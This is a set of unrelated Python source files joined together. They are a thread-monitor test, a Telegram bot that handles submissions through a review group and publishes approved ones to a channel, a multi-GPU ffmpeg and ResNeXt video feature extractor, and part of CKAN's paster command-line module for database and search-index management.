#----------------------------------------------------------------------
def _deamon_check_threads(self):
""""""
assert isinstance(self._threads_update_interval, (int, float))
while True:
#pprint('test')
self._sub_threads_list = None
self._sub_threads_list = self._enum_threads()
#print(len(self._sub_threads_list))
#print len(self._sub_threads_list)
threads_check_result = {}
threads_check_result['from'] = self._id
for i in self._sub_threads_list:
threads_check_result[i.name] = i.is_alive()
#pprint(threads_check_result)
self._status_monitor_pipe.send(threads_check_result)
time.sleep(self._threads_update_interval)
##----------------------------------------------------------------------
#@property
#def subthreads_count(self):
#return len(self._sub_threads_list)
########################################################################
class ProcessTaskTest(unittest.case.TestCase):
""""""
#----------------------------------------------------------------------
def print_bar(self):
""""""
print('-'*64)
#----------------------------------------------------------------------
def print_end_bar(self):
""""""
print('-'*30 + 'END' + '-'*31)
#----------------------------------------------------------------------
def runTest(self):
""""""
pipp, pipc = Pipe()
self.print_bar()
print('Test Task Interface')
ret_process = ProcessTask(id='test-1', target=testfun, args=(5,),
status_monitor_pipe=pipc)
ret_process.start()
print('Test get threads status')
time.sleep(1)
#print(ret_process.subthreads_count)
threads_status = pipp.recv()
self.assertIsInstance(threads_status, dict)
self.print_end_bar()
if __name__ == '__main__':
unittest.main()
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
reload(sys)
sys.setdefaultencoding('utf8')
Version_Code = 'v1.0.0'
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
CONFIG = json.loads(open(PATH + 'config.json', 'r').read())
DATA_LOCK = False
submission_list = json.loads(open(PATH + 'data.json', 'r').read())
def save_data():
global DATA_LOCK
while DATA_LOCK:
time.sleep(0.05)
DATA_LOCK = True
f = open(PATH + 'data.json', 'w')
f.write(json.dumps(submission_list, ensure_ascii=False))
f.close()
DATA_LOCK = False
def save_config():
f = open(PATH + 'config.json', 'w')
f.write(json.dumps(CONFIG, indent=4))
f.close()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print 'Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' \
+ CONFIG['Username'] + ')'
def process_msg(bot, update):
if update.channel_post != None:
return
if update.message.chat_id == CONFIG['Group_ID'] \
and update.message.reply_to_message != None:
if update.message.reply_to_message.from_user.id == CONFIG['ID'] \
and (update.message.reply_to_message.forward_from != None
or update.message.reply_to_message.forward_from_chat
!= None):
msg = update.message.reply_to_message
global submission_list
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] == True:
return
if update.message.text != None:
                # The submission was rejected
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + update.message.from_user.name
+ '](tg://user?id=' + str(update.message.from_user.id)
+ ")\n投稿被拒绝,理由:\n"+update.message.text, chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text='管理员:'+update.message.text,
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
return
if update.message.from_user.id == update.message.chat_id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real'),
telegram.InlineKeyboardButton("否",
callback_data='submission_type:anonymous')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
if update.message.forward_from != None \
or update.message.forward_from_chat != None:
if update.message.forward_from_chat != None:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
elif update.message.forward_from.id \
!= update.message.from_user.id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
bot.send_message(chat_id=update.message.chat_id,
text="即将完成投稿...\n您是否想要保留消息来源(保留消息发送者用户名)",
reply_to_message_id=update.message.message_id,
reply_markup=markup)
def process_command(bot, update):
if update.channel_post != None:
return
command = update.message.text[1:].replace(CONFIG['Username'], ''
).lower()
if command == 'start':
bot.send_message(chat_id=update.message.chat_id,
text="""可接收的投稿类型:
文字
图片
音频/语音
视频
文件""")
return
if command == 'version':
bot.send_message(chat_id=update.message.chat_id,
text='Telegram Submission Bot\n'
+ Version_Code
+ '\nhttps://github.com/Netrvin/telegram-submission-bot'
)
return
if update.message.from_user.id == CONFIG['Admin']:
if command == 'setgroup':
CONFIG['Group_ID'] = update.message.chat_id
save_config()
bot.send_message(chat_id=update.message.chat_id,
text="已设置本群为审稿群")
return
def anonymous_post(bot, msg, editor):
if msg.audio != None:
r = bot.send_audio(chat_id=CONFIG['Publish_Channel_ID'],
audio=msg.audio, caption=msg.caption)
elif msg.document != None:
r = bot.send_document(chat_id=CONFIG['Publish_Channel_ID'],
document=msg.document,
caption=msg.caption)
elif msg.voice != None:
r = bot.send_voice(chat_id=CONFIG['Publish_Channel_ID'],
voice=msg.voice, caption=msg.caption)
elif msg.video != None:
r = bot.send_video(chat_id=CONFIG['Publish_Channel_ID'],
video=msg.video, caption=msg.caption)
elif msg.photo:
r = bot.send_photo(chat_id=CONFIG['Publish_Channel_ID'],
photo=msg.photo[0], caption=msg.caption)
else:
r = bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=msg.text_markdown,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def real_name_post(bot, msg, editor):
global submission_list
r = bot.forward_message(chat_id=CONFIG['Publish_Channel_ID'],
from_chat_id=CONFIG['Group_ID'],
message_id=msg.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def process_callback(bot, update):
if update.channel_post != None:
return
global submission_list
query = update.callback_query
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:real':
real_name_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:anonymous':
anonymous_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.data == 'cancel:submission':
bot.edit_message_text(text="已取消投稿",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return
msg = "新投稿\n投稿人: [" + query.message.reply_to_message.from_user.name \
+ '](tg://user?id=' \
+ str(query.message.reply_to_message.from_user.id) + ")\n拒绝投稿请直接回复以上信息,可多次回复\n\n来源: "
fwd_msg = bot.forward_message(chat_id=CONFIG['Group_ID'],
from_chat_id=query.message.chat_id,
message_id=query.message.reply_to_message.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)] = {}
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['posted'] = False
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_Name'] = \
query.message.reply_to_message.from_user.name
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_ID'] = \
query.message.reply_to_message.from_user.id
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Original_MsgID'] = \
query.message.reply_to_message.message_id
if query.data == 'submission_type:real':
msg += "保留"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'real'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:real')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
elif query.data == 'submission_type:anonymous':
msg += "匿名"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'anonymous'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:anonymous')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
bot.edit_message_text(text="感谢您的投稿", chat_id=query.message.chat_id,
message_id=query.message.message_id)
threading.Thread(target=save_data).start()
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.text
| telegram.ext.Filters.audio
| telegram.ext.Filters.photo
| telegram.ext.Filters.video
| telegram.ext.Filters.voice
| telegram.ext.Filters.document, process_msg))
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command,
process_command))
dispatcher.add_handler(telegram.ext.CallbackQueryHandler(process_callback))
updater.start_polling()
print 'Started'
updater.idle()
print 'Stopping...'
save_data()
print 'Data saved.'
print 'Stopped.'
|
extract_feat2.py
|
import torch.multiprocessing as mp
import pickle
import os
import sys
import re
import json
import subprocess
import numpy as np
import torch
from time import time, sleep
from torch import nn
import argparse
from model import generate_model
from mean import get_mean
from classify2 import classify_video
from torch.multiprocessing import Process, Queue, set_start_method
try:
set_start_method('spawn')
except RuntimeError:
pass
def parse_opts():
parser = argparse.ArgumentParser()
parser.add_argument('--input', default='input', type=str, help='Input file path')
parser.add_argument('--video_root', default='', type=str, help='Root path of input videos')
parser.add_argument('--model', default='', type=str, help='Model file path')
parser.add_argument('--output_root', default='./output', type=str, help='Output file path')
parser.add_argument('--mode', default='feature', type=str,
help='Mode (score | feature). score outputs class scores. feature outputs features (after global average pooling).')
parser.add_argument('--batch_size', default=32, type=int, help='Batch Size')
parser.add_argument('--n_threads', default=8, type=int,
help='Number of threads for multi-thread loading')
parser.add_argument('--model_name', default='resnext', type=str,
                        help='Currently only supports resnet')
parser.add_argument('--model_depth', default=101, type=int,
help='Depth of resnet (10 | 18 | 34 | 50 | 101)')
parser.add_argument('--resnet_shortcut', default='B', type=str,
help='Shortcut type of resnet (A | B)')
parser.add_argument('--wide_resnet_k', default=2, type=int, help='Wide resnet k')
parser.add_argument('--resnext_cardinality', default=32, type=int, help='ResNeXt cardinality')
parser.add_argument('--no_cuda', action='store_true', help='If true, cuda is not used.')
parser.set_defaults(verbose=False)
args = parser.parse_args()
return args
# python extract_feat2.py --input ./input --video_root ./videos --output ./output --model ./PretrainedModels/resnext-101-kinetics.pth --resnet_shortcut B
class Video2frame_worker():
def __init__(self, class_names, queue, opt):
self.class_names = class_names
self.queue = queue
self.process = Process(target=self.ffmpeg, args=(queue, opt))
def ffmpeg(self, queue, opt):
for cls_name in self.class_names:
input_fns = os.listdir(os.path.join(opt.video_root, cls_name))
if not os.path.exists(os.path.join(opt.output_root, cls_name)):
os.mkdir(os.path.join(opt.output_root, cls_name))
outputs = []
for input_fn in input_fns:
input_fn = os.path.join(cls_name, input_fn)
# tmp_dir = 'tmp_' + input_fn.split('/')[-1]
tmp_dir = os.path.join('tmp', input_fn)
if os.path.exists(tmp_dir):
cmd = 'rm -rf ' + tmp_dir
subprocess.call(cmd, shell=True)
video_path = os.path.join(opt.video_root, input_fn)
if os.path.exists(video_path):
                    # Remove leftover temp files
if os.path.exists(tmp_dir):
subprocess.call('rm -rf ' + tmp_dir, shell=True)
                    # Process the video with FFmpeg
t1 = time()
                    # Spaces in the command need to be escaped
tmp_dir_cmd = tmp_dir.replace(' ', '\ ')
video_path = video_path.replace(' ', '\ ')
subprocess.call('mkdir -p ' + tmp_dir_cmd, shell=True)
cmd = 'ffmpeg -v 0 -i {} '.format(video_path) + tmp_dir_cmd + '/image_%05d.jpg'
print(cmd)
subprocess.call(cmd, shell=True)
print('FFMPEG processed for', time() - t1, 'seconds')
                    # Put the frame directory into the pending queue
queue.put(tmp_dir)
else:
print('{} does not exist'.format(video_path))
class Extractor():
def __init__(self, opt, queue, device):
self.opt = opt
self.process = Process(target=self.Extract, args=(opt, queue, device))
def Extract(self, opt, queue, device):
model = generate_model(opt)
print('loading model {}'.format(opt.model))
        # Move the model to the target device
device_id = int(device.split(':')[-1])
model = torch.nn.DataParallel(model, device_ids=[device_id])
model_data = torch.load(opt.model, map_location={'cuda:0': device})
assert opt.arch == model_data['arch']
model.load_state_dict(model_data['state_dict'])
model.to(device)
model.eval()
model.share_memory()
while True:
tmp_dir = queue.get()
            # Recover the original file name (tmp_dir looks like 'tmp/<cls_name>/<file_name>').
            input_fn = os.path.basename(tmp_dir)
            # Recover cls_name (the directory component between the slashes)
print('1', tmp_dir)
match = re.search('/([\s\S]+)/', tmp_dir)
cls_name = match[1]
output_fn = opt.output_root + '/' + cls_name + '/' + input_fn + '.pickle'
print('Extracting', tmp_dir, 'to', output_fn)
# result is a dict
if not os.path.exists(output_fn):
result = classify_video(tmp_dir, input_fn, model, opt)
with open(output_fn, 'wb') as f:
# Pickle the 'data' dictionary using the highest protocol available.
pickle.dump(result, f, pickle.HIGHEST_PROTOCOL)
else:
print('feature already exists:', output_fn)
if os.path.exists(tmp_dir):
subprocess.call('rm -rf ' + tmp_dir.replace(' ', '\ '), shell=True)
if __name__ == "__main__":
opt = parse_opts()
opt.mean = get_mean()
opt.arch = '{}-{}'.format(opt.model_name, opt.model_depth)
opt.sample_size = 112
opt.sample_duration = 16
opt.n_classes = 400
    # Queue of FFmpeg-processed frame directories (each entry is a directory path string).
queue = Queue()
# Testing Code
class_names = os.listdir(opt.video_root)
t1 = len(class_names)//4
t2 = len(class_names)//2
t3 = len(class_names)//4 * 3
t4 = len(class_names)
class_names1 = class_names[:t1]
class_names2 = class_names[t1:t2]
class_names3 = class_names[t2:t3]
class_names4 = class_names[t3:t4]
ff1 = Video2frame_worker(class_names1, queue, opt)
ff2 = Video2frame_worker(class_names2, queue, opt)
ff3 = Video2frame_worker(class_names3, queue, opt)
ff4 = Video2frame_worker(class_names4, queue, opt)
ext4 = Extractor(opt, queue, device='cuda:3')
ext3 = Extractor(opt, queue, device='cuda:2')
ext2 = Extractor(opt, queue, device='cuda:1')
ext1 = Extractor(opt, queue, device='cuda:0')
ff1.process.start()
ff2.process.start()
ff3.process.start()
ff4.process.start()
ext4.process.start()
ext3.process.start()
ext2.process.start()
ext1.process.start()
ff1.process.join()
ff2.process.join()
ff3.process.join()
ff4.process.join()
ext4.process.join()
ext3.process.join()
ext2.process.join()
ext1.process.join()
|
cli.py
|
# encoding: utf-8
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
import urlparse
from optparse import OptionConflictError
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
from ckan.common import config
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
    Print an error message to STDERR and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
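# A small, self-contained sketch (hypothetical credentials) of the dict shape produced by
# parse_db_config(); it inlines the same pattern so it can run without a loaded config.
def _example_parse_db_config():
    url = 'postgres://tester:pass@localhost:5432/ckantest3'
    pattern = ('^\s*(?P<db_type>\w*)://(?P<db_user>[^:]*):?(?P<db_pass>[^@]*)@'
               '(?P<db_host>[^/:]*):?(?P<db_port>[^/]*)/(?P<db_name>[\w.-]*)')
    return re.match(pattern, url).groupdict()
    # {'db_type': 'postgres', 'db_user': 'tester', 'db_pass': 'pass',
    #  'db_host': 'localhost', 'db_port': '5432', 'db_name': 'ckantest3'}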
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
    '''Base class for CKAN paster command classes to inherit from.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if self.options.config:
self.filename = os.path.abspath(self.options.config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
self.filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
self.filename = os.path.join(os.getcwd(), 'development.ini')
config_source = 'default value'
if not os.path.exists(self.filename):
msg = 'Config file not found: %s' % self.filename
msg += '\n(Given by: %s)' % config_source
raise self.BadCommand(msg)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self, load_site_user=True):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry = Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
    db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
                                   This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
        ### Get our config but without starting the pylons environment ###
conf = self._get_config()
        ### Get ids using our own engine, otherwise multiprocessing will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
            ## load the actual environment for each subprocess, so each has its own
            ## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
